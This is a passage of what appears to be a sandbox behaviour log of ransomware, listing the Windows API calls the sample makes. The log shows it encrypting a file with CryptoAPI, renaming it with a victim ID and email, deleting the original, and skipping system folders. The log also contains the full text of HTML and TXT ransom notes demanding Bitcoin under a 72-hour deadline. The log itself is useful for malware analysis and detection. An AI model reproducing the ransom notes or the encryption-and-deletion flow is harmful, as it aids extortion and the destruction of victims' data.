vm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".dat") returned=".dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0159.061] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0159.062] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0159.062] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0159.071] ReadFile (in: hFile=0x39c, lpBuffer=0x2900020, nNumberOfBytesToRead=0xd81d4, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0x2900020*, lpNumberOfBytesRead=0x189930*=0xd81d4, lpOverlapped=0x0) returned 1
	[0159.266] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.266] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb880) returned 1
	[0159.268] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.269] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0159.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.269] CryptHashData (hHash=0xfb9230, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0159.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.269] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb9230, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb93f0) returned 1
	[0159.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.269] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0xd81d4, dwBufLen=0xd81d4 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0xd81e0) returned 1
	[0159.278] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.278] RtlMoveMemory (in: Destination=0x29ee020, Source=0x2900020, Length=0xd81d4 | out: Destination=0x29ee020) 
	[0159.319] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.320] CryptEncrypt (in: hKey=0xfb93f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29ee020*, pdwDataLen=0x1894dc*=0xd81d4, dwBufLen=0xd81e0 | out: pbData=0x29ee020*, pdwDataLen=0x1894dc*=0xd81e0) returned 1
	[0159.350] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.350] CryptDestroyKey (hKey=0xfb93f0) returned 1
	[0159.350] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.351] CryptDestroyHash (hHash=0xfb9230) returned 1
	[0159.351] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.351] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0159.351] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.351] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0159.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.352] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0159.354] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 152
	[0159.354] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0159.355] WriteFile (in: hFile=0x3a0, lpBuffer=0x29ee020*, nNumberOfBytesToWrite=0xd81e0, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x29ee020*, lpNumberOfBytesWritten=0x189938*=0xd81e0, lpOverlapped=0x0) returned 1
	[0159.430] CloseHandle (hObject=0x3a0) returned 1
	[0159.502] CloseHandle (hObject=0x39c) returned 1
	[0159.502] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat")) returned 1
	[0159.558] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\stream.x86.en-us.man.dat")) returned 0
	[0159.559] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f2f99, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b5f2f99, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x21ebc700, ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0
	[0159.559] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0159.559] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0159.560] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16"
	[0159.560] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*.*"
	[0159.560] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0159.560] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0159.560] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\HELP_DECRYPT_YOUR_FILES.TXT") returned 113
	[0159.560] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0159.561] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0159.561] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0159.564] CloseHandle (hObject=0x390) returned 1
	[0159.565] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0159.566] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.566] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0159.567] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0159.567] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0159.568] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0159.568] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0159.568] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0159.568] CloseHandle (hObject=0x390) returned 1
	[0159.569] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0159.569] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0159.569] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0159.570] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\HELP_DECRYPT_YOUR_FILES.HTML") returned 114
	[0159.570] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0159.570] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0159.570] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0159.585] CloseHandle (hObject=0x390) returned 1
	[0159.585] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0159.586] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0159.586] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0159.587] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0159.588] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0159.589] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0159.589] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0159.589] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0159.589] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0159.590] CloseHandle (hObject=0x390) returned 1
	[0159.590] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x7899c62f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x78a31f8a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0159.590] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*.*") returned 89
	[0159.591] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0159.591] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\en-us.16\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*") returned 0x59
	[0159.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.591] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="windows") returned 0x0
	[0159.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="boot") returned 0x0
	[0159.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="system volume information") returned 0x0
	[0159.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0159.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="temp") returned 0x0
	[0159.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.593] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="program files") returned 0x0
	[0159.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.593] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="program files (x86)") returned 0x0
	[0159.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.593] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="appdata") returned 0x0
	[0159.594] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.594] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="application data") returned 0x0
	[0159.594] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.594] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="winnt") returned 0x0
	[0159.594] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.594] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="tmp") returned 0x0
	[0159.595] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.595] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="cache") returned 0x0
	[0159.595] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.595] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="temporary internet files") returned 0x0
	[0159.595] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.595] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="webcache") returned 0x0
	[0159.596] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.596] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="inetcache") returned 0x0
	[0159.596] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.596] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="nvidia") returned 0x0
	[0159.596] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.597] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="packages") returned 0x0
	[0159.597] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0159.597] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\en-us.16\\*.*", lpSrch="cookies") returned 0x0
